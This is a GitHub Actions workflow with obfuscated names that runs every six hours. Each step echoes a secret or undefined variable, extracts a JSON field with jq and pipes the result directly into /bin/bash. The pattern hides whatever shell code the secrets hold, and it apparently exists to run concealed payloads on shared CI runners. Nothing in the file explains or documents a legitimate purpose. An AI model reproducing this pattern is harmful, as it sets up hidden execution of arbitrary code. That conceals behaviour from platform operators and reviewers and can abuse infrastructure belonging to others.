name: muhong19871010

on:
  workflow_dispatch:
  schedule:
    - cron: '8 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: muhong19871010
        env:
          rll9: ${{ secrets.rll9 }}
        run: |
          echo $rll9 | jq -r .dyp3 | /bin/bash
          echo $emn9076 | jq -r .xmd07 | /bin/bash
          echo $s029 | jq -r .jz8 | /bin/bash
          echo $ofvx068 | jq -r .u96423 | /bin/bash
          echo $opcw33 | jq -r .covwc94152 | /bin/bash
          echo $lmm8012 | jq -r .quwlo293 | /bin/bash
          echo $qn024 | jq -r .arem08 | /bin/bash
          echo $g3 | jq -r .cvevr62 | /bin/bash
          echo $tvz0397 | jq -r .bpar35409 | /bin/bash
          echo $xcj1 | jq -r .sd31486 | /bin/bash
          echo $r5 | jq -r .rs8 | /bin/bash
          echo $tr04 | jq -r .j55 | /bin/bash

